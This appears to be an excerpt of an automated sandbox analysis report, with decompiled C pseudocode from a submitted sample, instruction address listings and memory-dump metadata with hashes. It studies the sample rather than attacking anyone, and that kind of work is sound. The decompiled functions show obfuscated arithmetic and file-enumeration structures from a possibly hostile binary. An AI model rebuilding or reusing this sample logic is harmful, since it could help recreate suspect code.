                                                                                                                                                                                                                                                                            									_v12 = 0;
                                                                                                                                                                                                                                                                            									_v8 = 0;
                                                                                                                                                                                                                                                                            									_v20 = 0;
                                                                                                                                                                                                                                                                            									__eflags = _t349 - 0xffffffff;
                                                                                                                                                                                                                                                                            									if(_t349 != 0xffffffff) {
                                                                                                                                                                                                                                                                            										_t250 = _v16 + 1;
                                                                                                                                                                                                                                                                            										__eflags = _t250;
                                                                                                                                                                                                                                                                            										_v32 = _t250;
                                                                                                                                                                                                                                                                            										_t373 =  &(_t262[_t349 + 1]);
                                                                                                                                                                                                                                                                            										do {
                                                                                                                                                                                                                                                                            											_t253 = E0037DEB0( *_t373, _t342, _t295, 0);
                                                                                                                                                                                                                                                                            											_v68 = _t303;
                                                                                                                                                                                                                                                                            											_t373 = _t373 - 4;
                                                                                                                                                                                                                                                                            											_v20 = _t262;
                                                                                                                                                                                                                                                                            											_t342 = _t295;
                                                                                                                                                                                                                                                                            											_t303 = 0 + _t253;
                                                                                                                                                                                                                                                                            											asm("adc ecx, 0x0");
                                                                                                                                                                                                                                                                            											_v12 = _t303;
                                                                                                                                                                                                                                                                            											_t34 =  &_v32;
                                                                                                                                                                                                                                                                            											 *_t34 = _v32 - 1;
                                                                                                                                                                                                                                                                            											__eflags =  *_t34;
                                                                                                                                                                                                                                                                            											_v8 = _v12;
                                                                                                                                                                                                                                                                            											_t295 = _v44;
                                                                                                                                                                                                                                                                            										} while ( *_t34 != 0);
                                                                                                                                                                                                                                                                            										_t262 = _a4;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									_v544 = 0;
                                                                                                                                                                                                                                                                            									_t41 =  &(_t262[1]); // 0x4
                                                                                                                                                                                                                                                                            									_t370 = _t41;
                                                                                                                                                                                                                                                                            									 *_t262 = 0;
                                                                                                                                                                                                                                                                            									E0037B98E(_t370, 0x1cc,  &_v540, 0);
                                                                                                                                                                                                                                                                            									_t247 = _v20;
                                                                                                                                                                                                                                                                            									__eflags = 0 - _t247;
                                                                                                                                                                                                                                                                            									 *_t370 = _t342;
                                                                                                                                                                                                                                                                            									_t262[2] = _t247;
                                                                                                                                                                                                                                                                            									asm("sbb ecx, ecx");
                                                                                                                                                                                                                                                                            									__eflags =  ~0x00000000;
                                                                                                                                                                                                                                                                            									 *_t262 = 0xbadbae;
                                                                                                                                                                                                                                                                            									return _v12;
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									_t344 =  &(_t262[1]);
                                                                                                                                                                                                                                                                            									_v544 = 0;
                                                                                                                                                                                                                                                                            									 *_t262 = 0;
                                                                                                                                                                                                                                                                            									E0037B98E(_t344, 0x1cc,  &_v540, 0);
                                                                                                                                                                                                                                                                            									_t256 = _t262[1];
                                                                                                                                                                                                                                                                            									_t322 = _t256 % _v44;
                                                                                                                                                                                                                                                                            									__eflags = 0 - _t322;
                                                                                                                                                                                                                                                                            									 *_t344 = _t322;
                                                                                                                                                                                                                                                                            									asm("sbb ecx, ecx");
                                                                                                                                                                                                                                                                            									__eflags = 0;
                                                                                                                                                                                                                                                                            									 *_t262 =  ~0x00000000;
                                                                                                                                                                                                                                                                            									return _t256 / _v44;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								_v544 = _t198;
                                                                                                                                                                                                                                                                            								 *_t262 = _t198;
                                                                                                                                                                                                                                                                            								E0037B98E( &(_t262[1]), 0x1cc,  &_v540, _t198);
                                                                                                                                                                                                                                                                            								__eflags = 0;
                                                                                                                                                                                                                                                                            								return _t262[1];
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						__eflags = 0;
                                                                                                                                                                                                                                                                            						return 0;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					return _t197;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}























































































                                                                                                                                                                                                                                                                            0x0037856c
                                                                                                                                                                                                                                                                            0x0037856f
                                                                                                                                                                                                                                                                            0x00378573
                                                                                                                                                                                                                                                                            0x0037857d
                                                                                                                                                                                                                                                                            0x00378580
                                                                                                                                                                                                                                                                            0x00378582
                                                                                                                                                                                                                                                                            0x00378584
                                                                                                                                                                                                                                                                            0x00378591
                                                                                                                                                                                                                                                                            0x00378594
                                                                                                                                                                                                                                                                            0x00378597
                                                                                                                                                                                                                                                                            0x0037859a
                                                                                                                                                                                                                                                                            0x0037859c
                                                                                                                                                                                                                                                                            0x003786cf
                                                                                                                                                                                                                                                                            0x003786d1
                                                                                                                                                                                                                                                                            0x0037871a
                                                                                                                                                                                                                                                                            0x0037871e
                                                                                                                                                                                                                                                                            0x00378724
                                                                                                                                                                                                                                                                            0x003786d3
                                                                                                                                                                                                                                                                            0x003786d8
                                                                                                                                                                                                                                                                            0x003786da
                                                                                                                                                                                                                                                                            0x003786dd
                                                                                                                                                                                                                                                                            0x003786df
                                                                                                                                                                                                                                                                            0x003786e1
                                                                                                                                                                                                                                                                            0x00378715
                                                                                                                                                                                                                                                                            0x00378715
                                                                                                                                                                                                                                                                            0x00378715
                                                                                                                                                                                                                                                                            0x003786e3
                                                                                                                                                                                                                                                                            0x003786e8
                                                                                                                                                                                                                                                                            0x003786ee
                                                                                                                                                                                                                                                                            0x003786ee
                                                                                                                                                                                                                                                                            0x003786f1
                                                                                                                                                                                                                                                                            0x003786f3
                                                                                                                                                                                                                                                                            0x003786f5
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x003786f7
                                                                                                                                                                                                                                                                            0x003786f8
                                                                                                                                                                                                                                                                            0x003786fb
                                                                                                                                                                                                                                                                            0x003786fe
                                                                                                                                                                                                                                                                            0x00378700
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00378702
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00378702
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00378700
                                                                                                                                                                                                                                                                            0x00378704
                                                                                                                                                                                                                                                                            0x0037870b
                                                                                                                                                                                                                                                                            0x0037870f
                                                                                                                                                                                                                                                                            0x00378713
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00378713
                                                                                                                                                                                                                                                                            0x00378716
                                                                                                                                                                                                                                                                            0x00378716
                                                                                                                                                                                                                                                                            0x00378718
                                                                                                                                                                                                                                                                            0x00378725
                                                                                                                                                                                                                                                                            0x00378728
                                                                                                                                                                                                                                                                            0x0037872b
                                                                                                                                                                                                                                                                            0x0037872e
                                                                                                                                                                                                                                                                            0x0037872e
                                                                                                                                                                                                                                                                            0x00378732
                                                                                                                                                                                                                                                                            0x00378735
                                                                                                                                                                                                                                                                            0x00378738
                                                                                                                                                                                                                                                                            0x0037873b
                                                                                                                                                                                                                                                                            0x00378746
                                                                                                                                                                                                                                                                            0x0037873d
                                                                                                                                                                                                                                                                            0x00378742
                                                                                                                                                                                                                                                                            0x00378742
                                                                                                                                                                                                                                                                            0x00378750
                                                                                                                                                                                                                                                                            0x00378755
                                                                                                                                                                                                                                                                            0x00378758
                                                                                                                                                                                                                                                                            0x0037875a
                                                                                                                                                                                                                                                                            0x00378764
                                                                                                                                                                                                                                                                            0x00378767
                                                                                                                                                                                                                                                                            0x0037876e
                                                                                                                                                                                                                                                                            0x00378771
                                                                                                                                                                                                                                                                            0x00378774
                                                                                                                                                                                                                                                                            0x0037877c
                                                                                                                                                                                                                                                                            0x00378782
                                                                                                                                                                                                                                                                            0x00378782
                                                                                                                                                                                                                                                                            0x00378782
                                                                                                                                                                                                                                                                            0x00378782
                                                                                                                                                                                                                                                                            0x00378774
                                                                                                                                                                                                                                                                            0x00378787
                                                                                                                                                                                                                                                                            0x0037878e
                                                                                                                                                                                                                                                                            0x0037878e
                                                                                                                                                                                                                                                                            0x00378791
                                                                                                                                                                                                                                                                            0x00378794
                                                                                                                                                                                                                                                                            0x003789c6
                                                                                                                                                                                                                                                                            0x003789c6
                                                                                                                                                                                                                                                                            0x0037879a
                                                                                                                                                                                                                                                                            0x003787a0
                                                                                                                                                                                                                                                                            0x003787a3
                                                                                                                                                                                                                                                                            0x003787a9
                                                                                                                                                                                                                                                                            0x003787ac
                                                                                                                                                                                                                                                                            0x003787af
                                                                                                                                                                                                                                                                            0x003787b2
                                                                                                                                                                                                                                                                            0x003787b2
                                                                                                                                                                                                                                                                            0x003787b5
                                                                                                                                                                                                                                                                            0x003787bc
                                                                                                                                                                                                                                                                            0x003787bc
                                                                                                                                                                                                                                                                            0x003787b7
                                                                                                                                                                                                                                                                            0x003787b7
                                                                                                                                                                                                                                                                            0x003787b7
                                                                                                                                                                                                                                                                            0x003787be
                                                                                                                                                                                                                                                                            0x003787c2
                                                                                                                                                                                                                                                                            0x003787c5
                                                                                                                                                                                                                                                                            0x003787c7
                                                                                                                                                                                                                                                                            0x003787ca
                                                                                                                                                                                                                                                                            0x003787d1
                                                                                                                                                                                                                                                                            0x003787d4
                                                                                                                                                                                                                                                                            0x003787d7
                                                                                                                                                                                                                                                                            0x003787e2
                                                                                                                                                                                                                                                                            0x003787e5
                                                                                                                                                                                                                                                                            0x003787ea
                                                                                                                                                                                                                                                                            0x003787ef
                                                                                                                                                                                                                                                                            0x003787f6
                                                                                                                                                                                                                                                                            0x003787fb
                                                                                                                                                                                                                                                                            0x003787fd
                                                                                                                                                                                                                                                                            0x003787ff
                                                                                                                                                                                                                                                                            0x00378803
                                                                                                                                                                                                                                                                            0x00378806
                                                                                                                                                                                                                                                                            0x00378809
                                                                                                                                                                                                                                                                            0x00378811
                                                                                                                                                                                                                                                                            0x0037881a
                                                                                                                                                                                                                                                                            0x0037881a
                                                                                                                                                                                                                                                                            0x0037881c
                                                                                                                                                                                                                                                                            0x0037881f
                                                                                                                                                                                                                                                                            0x0037881f
                                                                                                                                                                                                                                                                            0x00378809
                                                                                                                                                                                                                                                                            0x00378829
                                                                                                                                                                                                                                                                            0x0037882e
                                                                                                                                                                                                                                                                            0x00378833
                                                                                                                                                                                                                                                                            0x00378835
                                                                                                                                                                                                                                                                            0x00378838
                                                                                                                                                                                                                                                                            0x0037883a
                                                                                                                                                                                                                                                                            0x0037883d
                                                                                                                                                                                                                                                                            0x00378840
                                                                                                                                                                                                                                                                            0x00378842
                                                                                                                                                                                                                                                                            0x00378845
                                                                                                                                                                                                                                                                            0x00378848
                                                                                                                                                                                                                                                                            0x0037884a
                                                                                                                                                                                                                                                                            0x00378851
                                                                                                                                                                                                                                                                            0x00378856
                                                                                                                                                                                                                                                                            0x00378859
                                                                                                                                                                                                                                                                            0x00378863
                                                                                                                                                                                                                                                                            0x00378865
                                                                                                                                                                                                                                                                            0x00378867
                                                                                                                                                                                                                                                                            0x0037886a
                                                                                                                                                                                                                                                                            0x0037886a
                                                                                                                                                                                                                                                                            0x0037886c
                                                                                                                                                                                                                                                                            0x0037886f
                                                                                                                                                                                                                                                                            0x00378872
                                                                                                                                                                                                                                                                            0x00378875
                                                                                                                                                                                                                                                                            0x00378878
                                                                                                                                                                                                                                                                            0x0037884c
                                                                                                                                                                                                                                                                            0x0037884c
                                                                                                                                                                                                                                                                            0x0037884f
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037884f
                                                                                                                                                                                                                                                                            0x0037887b
                                                                                                                                                                                                                                                                            0x0037887d
                                                                                                                                                                                                                                                                            0x0037887f
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00378881
                                                                                                                                                                                                                                                                            0x00378881
                                                                                                                                                                                                                                                                            0x00378884
                                                                                                                                                                                                                                                                            0x00378886
                                                                                                                                                                                                                                                                            0x00378886
                                                                                                                                                                                                                                                                            0x00378894
                                                                                                                                                                                                                                                                            0x00378897
                                                                                                                                                                                                                                                                            0x0037889c
                                                                                                                                                                                                                                                                            0x0037889e
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x003788a0
                                                                                                                                                                                                                                                                            0x003788a7
                                                                                                                                                                                                                                                                            0x003788a7
                                                                                                                                                                                                                                                                            0x003788aa
                                                                                                                                                                                                                                                                            0x003788ad
                                                                                                                                                                                                                                                                            0x003788b0
                                                                                                                                                                                                                                                                            0x003788b3
                                                                                                                                                                                                                                                                            0x003788b3
                                                                                                                                                                                                                                                                            0x003788b6
                                                                                                                                                                                                                                                                            0x003788b9
                                                                                                                                                                                                                                                                            0x003788bd
                                                                                                                                                                                                                                                                            0x003788c0
                                                                                                                                                                                                                                                                            0x003788c2
                                                                                                                                                                                                                                                                            0x003788c5
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x003788c7
                                                                                                                                                                                                                                                                            0x003788c5
                                                                                                                                                                                                                                                                            0x003788a2
                                                                                                                                                                                                                                                                            0x003788a2
                                                                                                                                                                                                                                                                            0x003788a5
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x003788a5
                                                                                                                                                                                                                                                                            0x003788cc
                                                                                                                                                                                                                                                                            0x003788cc
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x003788cc
                                                                                                                                                                                                                                                                            0x003788c9
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x003788c9
                                                                                                                                                                                                                                                                            0x00378884
                                                                                                                                                                                                                                                                            0x0037887f
                                                                                                                                                                                                                                                                            0x003788cf
                                                                                                                                                                                                                                                                            0x003788cf
                                                                                                                                                                                                                                                                            0x003788d1
                                                                                                                                                                                                                                                                            0x003788db
                                                                                                                                                                                                                                                                            0x003788db
                                                                                                                                                                                                                                                                            0x003788de
                                                                                                                                                                                                                                                                            0x003788e0
                                                                                                                                                                                                                                                                            0x003788e2
                                                                                                                                                                                                                                                                            0x003788e4
                                                                                                                                                                                                                                                                            0x003788e9
                                                                                                                                                                                                                                                                            0x003788ec
                                                                                                                                                                                                                                                                            0x003788ec
                                                                                                                                                                                                                                                                            0x003788ef
                                                                                                                                                                                                                                                                            0x003788f2
                                                                                                                                                                                                                                                                            0x003788f5
                                                                                                                                                                                                                                                                            0x003788f7
                                                                                                                                                                                                                                                                            0x0037890c
                                                                                                                                                                                                                                                                            0x0037890e
                                                                                                                                                                                                                                                                            0x00378910
                                                                                                                                                                                                                                                                            0x00378912
                                                                                                                                                                                                                                                                            0x00378914
                                                                                                                                                                                                                                                                            0x00378916
                                                                                                                                                                                                                                                                            0x00378918
                                                                                                                                                                                                                                                                            0x0037891a
                                                                                                                                                                                                                                                                            0x0037891d
                                                                                                                                                                                                                                                                            0x0037891d
                                                                                                                                                                                                                                                                            0x00378921
                                                                                                                                                                                                                                                                            0x00378923
                                                                                                                                                                                                                                                                            0x00378929
                                                                                                                                                                                                                                                                            0x0037892c
                                                                                                                                                                                                                                                                            0x0037892c
                                                                                                                                                                                                                                                                            0x0037892c
                                                                                                                                                                                                                                                                            0x00378930
                                                                                                                                                                                                                                                                            0x00378930
                                                                                                                                                                                                                                                                            0x00378935
                                                                                                                                                                                                                                                                            0x00378938
                                                                                                                                                                                                                                                                            0x00378938
                                                                                                                                                                                                                                                                            0x0037893d
                                                                                                                                                                                                                                                                            0x0037893f
                                                                                                                                                                                                                                                                            0x00378941
                                                                                                                                                                                                                                                                            0x00378948
                                                                                                                                                                                                                                                                            0x00378948
                                                                                                                                                                                                                                                                            0x0037894a
                                                                                                                                                                                                                                                                            0x0037894f
                                                                                                                                                                                                                                                                            0x00378951
                                                                                                                                                                                                                                                                            0x00378954
                                                                                                                                                                                                                                                                            0x00378954
                                                                                                                                                                                                                                                                            0x00378957
                                                                                                                                                                                                                                                                            0x00378960
                                                                                                                                                                                                                                                                            0x00378960
                                                                                                                                                                                                                                                                            0x00378962
                                                                                                                                                                                                                                                                            0x00378962
                                                                                                                                                                                                                                                                            0x00378967
                                                                                                                                                                                                                                                                            0x0037896d
                                                                                                                                                                                                                                                                            0x00378971
                                                                                                                                                                                                                                                                            0x00378974
                                                                                                                                                                                                                                                                            0x00378977
                                                                                                                                                                                                                                                                            0x00378979
                                                                                                                                                                                                                                                                            0x00378979
                                                                                                                                                                                                                                                                            0x00378979
                                                                                                                                                                                                                                                                            0x0037897e
                                                                                                                                                                                                                                                                            0x0037897e
                                                                                                                                                                                                                                                                            0x00378981
                                                                                                                                                                                                                                                                            0x00378984
                                                                                                                                                                                                                                                                            0x00378943
                                                                                                                                                                                                                                                                            0x00378943
                                                                                                                                                                                                                                                                            0x00378946
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00378946
                                                                                                                                                                                                                                                                            0x00378941
                                                                                                                                                                                                                                                                            0x0037898b
                                                                                                                                                                                                                                                                            0x0037898b
                                                                                                                                                                                                                                                                            0x0037898c
                                                                                                                                                                                                                                                                            0x003788d3
                                                                                                                                                                                                                                                                            0x003788d3
                                                                                                                                                                                                                                                                            0x003788d5
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x003788d5
                                                                                                                                                                                                                                                                            0x0037899c
                                                                                                                                                                                                                                                                            0x003789a1
                                                                                                                                                                                                                                                                            0x003789a4
                                                                                                                                                                                                                                                                            0x003789a8
                                                                                                                                                                                                                                                                            0x003789a9
                                                                                                                                                                                                                                                                            0x003789ac
                                                                                                                                                                                                                                                                            0x003789af
                                                                                                                                                                                                                                                                            0x003789b0
                                                                                                                                                                                                                                                                            0x003789b3
                                                                                                                                                                                                                                                                            0x003789b6
                                                                                                                                                                                                                                                                            0x003789b9
                                                                                                                                                                                                                                                                            0x003789bc
                                                                                                                                                                                                                                                                            0x003789bc
                                                                                                                                                                                                                                                                            0x003789c4
                                                                                                                                                                                                                                                                            0x003789cb
                                                                                                                                                                                                                                                                            0x003789cc
                                                                                                                                                                                                                                                                            0x003789ce
                                                                                                                                                                                                                                                                            0x003789d0
                                                                                                                                                                                                                                                                            0x003789d2
                                                                                                                                                                                                                                                                            0x003789d5
                                                                                                                                                                                                                                                                            0x003789e0
                                                                                                                                                                                                                                                                            0x003789e0
                                                                                                                                                                                                                                                                            0x003789e6
                                                                                                                                                                                                                                                                            0x003789e6
                                                                                                                                                                                                                                                                            0x003789e9
                                                                                                                                                                                                                                                                            0x003789ea
                                                                                                                                                                                                                                                                            0x003789ea
                                                                                                                                                                                                                                                                            0x003789e0
                                                                                                                                                                                                                                                                            0x003789ee
                                                                                                                                                                                                                                                                            0x003789f0
                                                                                                                                                                                                                                                                            0x003789f2
                                                                                                                                                                                                                                                                            0x003789f4
                                                                                                                                                                                                                                                                            0x003789f4
                                                                                                                                                                                                                                                                            0x003789f6
                                                                                                                                                                                                                                                                            0x003789fa
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x003789fc
                                                                                                                                                                                                                                                                            0x003789fc
                                                                                                                                                                                                                                                                            0x003789ff
                                                                                                                                                                                                                                                                            0x00378a01
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00378a01
                                                                                                                                                                                                                                                                            0x003789f4
                                                                                                                                                                                                                                                                            0x00378a03
                                                                                                                                                                                                                                                                            0x00378a0d
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00378718
                                                                                                                                                                                                                                                                            0x003785a2
                                                                                                                                                                                                                                                                            0x003785a2
                                                                                                                                                                                                                                                                            0x003785a2
                                                                                                                                                                                                                                                                            0x003785a5
                                                                                                                                                                                                                                                                            0x003785a8
                                                                                                                                                                                                                                                                            0x003785ab
                                                                                                                                                                                                                                                                            0x003785dc
                                                                                                                                                                                                                                                                            0x003785de
                                                                                                                                                                                                                                                                            0x00378629
                                                                                                                                                                                                                                                                            0x0037862b
                                                                                                                                                                                                                                                                            0x00378632
                                                                                                                                                                                                                                                                            0x00378639
                                                                                                                                                                                                                                                                            0x0037863c
                                                                                                                                                                                                                                                                            0x0037863f
                                                                                                                                                                                                                                                                            0x00378645
                                                                                                                                                                                                                                                                            0x00378645
                                                                                                                                                                                                                                                                            0x00378646
                                                                                                                                                                                                                                                                            0x00378649
                                                                                                                                                                                                                                                                            0x00378650
                                                                                                                                                                                                                                                                            0x00378659
                                                                                                                                                                                                                                                                            0x0037865e
                                                                                                                                                                                                                                                                            0x00378661
                                                                                                                                                                                                                                                                            0x00378666
                                                                                                                                                                                                                                                                            0x00378669
                                                                                                                                                                                                                                                                            0x0037866b
                                                                                                                                                                                                                                                                            0x00378670
                                                                                                                                                                                                                                                                            0x00378673
                                                                                                                                                                                                                                                                            0x00378676
                                                                                                                                                                                                                                                                            0x00378676
                                                                                                                                                                                                                                                                            0x00378676
                                                                                                                                                                                                                                                                            0x0037867a
                                                                                                                                                                                                                                                                            0x0037867d
                                                                                                                                                                                                                                                                            0x0037867d
                                                                                                                                                                                                                                                                            0x00378682
                                                                                                                                                                                                                                                                            0x00378682
                                                                                                                                                                                                                                                                            0x0037868d
                                                                                                                                                                                                                                                                            0x00378698
                                                                                                                                                                                                                                                                            0x00378698
                                                                                                                                                                                                                                                                            0x0037869b
                                                                                                                                                                                                                                                                            0x003786a7
                                                                                                                                                                                                                                                                            0x003786ac
                                                                                                                                                                                                                                                                            0x003786b7
                                                                                                                                                                                                                                                                            0x003786b9
                                                                                                                                                                                                                                                                            0x003786bb
                                                                                                                                                                                                                                                                            0x003786c1
                                                                                                                                                                                                                                                                            0x003786c6
                                                                                                                                                                                                                                                                            0x003786c8
                                                                                                                                                                                                                                                                            0x003786ce
                                                                                                                                                                                                                                                                            0x003785e0
                                                                                                                                                                                                                                                                            0x003785ec
                                                                                                                                                                                                                                                                            0x003785ef
                                                                                                                                                                                                                                                                            0x003785ff
                                                                                                                                                                                                                                                                            0x00378605
                                                                                                                                                                                                                                                                            0x0037860c
                                                                                                                                                                                                                                                                            0x0037860e
                                                                                                                                                                                                                                                                            0x00378616
                                                                                                                                                                                                                                                                            0x00378618
                                                                                                                                                                                                                                                                            0x0037861a
                                                                                                                                                                                                                                                                            0x0037861f
                                                                                                                                                                                                                                                                            0x00378622
                                                                                                                                                                                                                                                                            0x00378628
                                                                                                                                                                                                                                                                            0x00378628
                                                                                                                                                                                                                                                                            0x003785ad
                                                                                                                                                                                                                                                                            0x003785b4
                                                                                                                                                                                                                                                                            0x003785ba
                                                                                                                                                                                                                                                                            0x003785c9
                                                                                                                                                                                                                                                                            0x003785d3
                                                                                                                                                                                                                                                                            0x003785db
                                                                                                                                                                                                                                                                            0x003785db
                                                                                                                                                                                                                                                                            0x003785ab
                                                                                                                                                                                                                                                                            0x00378586
                                                                                                                                                                                                                                                                            0x00378589
                                                                                                                                                                                                                                                                            0x0037858f
                                                                                                                                                                                                                                                                            0x0037858f
                                                                                                                                                                                                                                                                            0x00378575
                                                                                                                                                                                                                                                                            0x0037857b
                                                                                                                                                                                                                                                                            0x0037857b

                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.811704054.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811690404.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811747442.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812148427.00000000003CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812660058.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812733384.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_370000_nhVJ8J5qOt.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 2ae5becf46503a84583b0f291ed6d223db1159ac6cafb2d7e6af219b5e791b94
                                                                                                                                                                                                                                                                            • Instruction ID: c6614113e4d1cc63863dab34ca6d212590fdca9c065471717c814fe4f95acae3
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2ae5becf46503a84583b0f291ed6d223db1159ac6cafb2d7e6af219b5e791b94
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E8024D71E402199BDF25CFA9C8846ADFBF1FF88324F258169D919EB344DB34A941CB81
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E00372940(signed int* _a4, signed int _a8, signed int _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                                                                                                                            				intOrPtr _v36;
                                                                                                                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                                                                                                                            				signed int _v44;
                                                                                                                                                                                                                                                                            				signed int _v48;
                                                                                                                                                                                                                                                                            				intOrPtr _v52;
                                                                                                                                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                                                                                                                                            				intOrPtr _v60;
                                                                                                                                                                                                                                                                            				signed int* _v64;
                                                                                                                                                                                                                                                                            				struct _WIN32_FIND_DATAA* _v68;
                                                                                                                                                                                                                                                                            				CHAR* _v72;
                                                                                                                                                                                                                                                                            				CHAR* _v76;
                                                                                                                                                                                                                                                                            				signed int _v80;
                                                                                                                                                                                                                                                                            				signed int* _v84;
                                                                                                                                                                                                                                                                            				signed int _v88;
                                                                                                                                                                                                                                                                            				signed int _v92;
                                                                                                                                                                                                                                                                            				signed int _v96;
                                                                                                                                                                                                                                                                            				intOrPtr _t206;
                                                                                                                                                                                                                                                                            				signed int _t209;
                                                                                                                                                                                                                                                                            				signed int _t227;
                                                                                                                                                                                                                                                                            				intOrPtr _t245;
                                                                                                                                                                                                                                                                            				intOrPtr _t246;
                                                                                                                                                                                                                                                                            				intOrPtr _t278;
                                                                                                                                                                                                                                                                            				intOrPtr _t288;
                                                                                                                                                                                                                                                                            				intOrPtr _t325;
                                                                                                                                                                                                                                                                            				intOrPtr _t345;
                                                                                                                                                                                                                                                                            				intOrPtr _t350;
                                                                                                                                                                                                                                                                            				intOrPtr _t357;
                                                                                                                                                                                                                                                                            				signed int _t367;
                                                                                                                                                                                                                                                                            				intOrPtr _t381;
                                                                                                                                                                                                                                                                            				intOrPtr _t395;
                                                                                                                                                                                                                                                                            				intOrPtr _t396;
                                                                                                                                                                                                                                                                            				intOrPtr* _t401;
                                                                                                                                                                                                                                                                            				intOrPtr _t411;
                                                                                                                                                                                                                                                                            				intOrPtr _t413;
                                                                                                                                                                                                                                                                            				intOrPtr _t414;
                                                                                                                                                                                                                                                                            				void* _t422;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = _a20 - 0x29c;
                                                                                                                                                                                                                                                                            				_v36 = _a8 - 0x26e5;
                                                                                                                                                                                                                                                                            				_v20 = _a12 + 0x54;
                                                                                                                                                                                                                                                                            				_v12 = _a16 ^ 0x000002ef;
                                                                                                                                                                                                                                                                            				_v16 = _a8 ^ 0x000026e5;
                                                                                                                                                                                                                                                                            				_v28 = _a12 ^ 0x00002633;
                                                                                                                                                                                                                                                                            				_v24 = _a24 - 0x24c7;
                                                                                                                                                                                                                                                                            				if(_v16 > _v20 - 0x54) {
                                                                                                                                                                                                                                                                            					_v32 = _v8;
                                                                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                                                                            						_t206 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t139 = _t206 + 0x5c; // 0x1
                                                                                                                                                                                                                                                                            						if(_v32 <=  *_t139 *  *0x40d440) {
                                                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t209 = _a4[0x32];
                                                                                                                                                                                                                                                                            						_t288 =  *0x40d3d8; // 0x0
                                                                                                                                                                                                                                                                            						_t144 = _t209 - 0x2633; // -9779
                                                                                                                                                                                                                                                                            						_v72 = _t288 + _t144;
                                                                                                                                                                                                                                                                            						_t357 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_v68 =  *((intOrPtr*)(_t357 + 0x44)) + _v28 & _v28;
